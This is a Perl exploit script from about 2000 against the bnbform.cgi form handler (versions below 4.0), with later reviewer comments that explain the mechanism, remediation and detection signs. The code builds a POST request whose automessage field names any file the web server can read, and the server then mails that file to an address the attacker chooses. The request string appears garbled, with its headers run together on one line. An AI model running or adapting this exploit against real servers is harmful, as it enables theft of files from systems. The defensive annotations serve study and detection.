#!/usr/bin/perl -w

## bnbform.cgi exploit - discovered in Phrack55,
## article p55-07 by whisker author, rain.forest.puppy.
## The article is about Perl CGI problems, and is very
## interesting reading - well, done! This exploit will
## mail you any file readable by the httpd daemon.
##
## All version below bnbform v4.0 are vulnerable.
##
## ./bnbform.pl hell.no cgi-bin me me@mail.com /etc/issue
##
## - teleh0r@doglover.com / anno 2000 -
## http://teleh0r.cjb.net

# Reviewer notes (what this listing shows, read from the defender's side):
#
#  * Mechanism: one HTTP POST to /<cgidir>/bnbform.cgi whose form body sets
#    `autorespond=yes`, `automessage=<caller-chosen path>` and
#    `submit_by=<caller-chosen address>`. Per the header above, the affected
#    script then mails that file to the address. Presumably bnbform.cgi uses
#    the client-supplied `automessage` value as the auto-reply file without
#    confining it to an expected directory -- confirm against the CGI source.
#  * Exposure: anything the web server account can read (header above), so
#    the practical impact is bounded by how the httpd user is privileged.
#  * Remediation: the header states that versions below bnbform v4.0 are
#    affected; move to v4.0 or later, or remove the script. File names such
#    as the auto-reply template belong in server-side configuration, not in
#    client-controlled form fields.
#  * Detection: requests for bnbform.cgi whose body carries an `automessage`
#    value with encoded path separators (%2F), and unexpected outbound mail
#    generated by the web server. The fields sit in the POST body, so they
#    are only visible where request bodies are inspected or logged. The
#    User-Agent below is a generic browser string and is not a usable
#    indicator on its own.

use strict;
use Socket;

# Five positional arguments are required (see the assignment from @ARGV below).
# NOTE(review): the usage text names no arguments in this copy; they may have
# been lost when the page was extracted.
if (@ARGV < 5) {
    print("Usage: $0 \n");
    exit(1);
}

my($target,$cgidir,$name,$email,$file,$length,
   $agent,$command,$sploit,$iaddr,$paddr,$proto);

# target host, CGI directory, form "name" value, recipient address, file path.
($target,$cgidir,$name,$email,$file) = @ARGV;

print("\nRemote host: $target\n");
print("CGI-script: /$cgidir/bnbform.cgi\n");
print("File to retrieve: $file\n");

# Only "/" is percent-encoded; every other character of the arguments is
# placed into the form body unchanged.
$file =~ s/\//%2F/g;

# The declared Content-length is a hard-coded constant plus the lengths of the
# three variable fields; it is not computed from $command itself.
$length = 186 + length($name.$email.$file);

# Fixed browser-like User-Agent header value.
$agent = "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"; # heh ;)

# Form body: `automessage` carries the requested path and `submit_by` the
# address supplied on the command line.
$command= "name=$name&submit_by=$email&required=name&data_order=name".
          "&autorespond=yes&automessage=$file&form_id=My+Test+Form";

# Request text assembled from the pieces above.
# NOTE(review): in this copy the literal is a single line with the header
# fields separated by spaces; the original layout is not recoverable from the
# page, so it is reproduced exactly as found.
$sploit= "POST /$cgidir/bnbform.cgi HTTP/1.0 Connection: close User-Agent: $agent Host: $target Content-type: application/x-www-form-urlencoded Content-length: $length $command";

# Resolve the host and build a TCP endpoint; the port is fixed at 80.
$iaddr = inet_aton($target) || die("Error: $!\n");
$paddr = sockaddr_in(80, $iaddr) || die("Error: $!\n");
$proto = getprotobyname('tcp') || die("Error: $!\n");

# Connect, send the request followed by CR LF, and close at once. The server's
# response is never read, so the final message is printed whether or not the
# request was accepted.
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
send(SOCKET,"$sploit\015\012", 0) || die("Error: $!\n");
close(SOCKET);

sleep(3);
print("\nAll done - check your mail.\n");
exit(0);
# www.hack.co.za [26 July 2000]#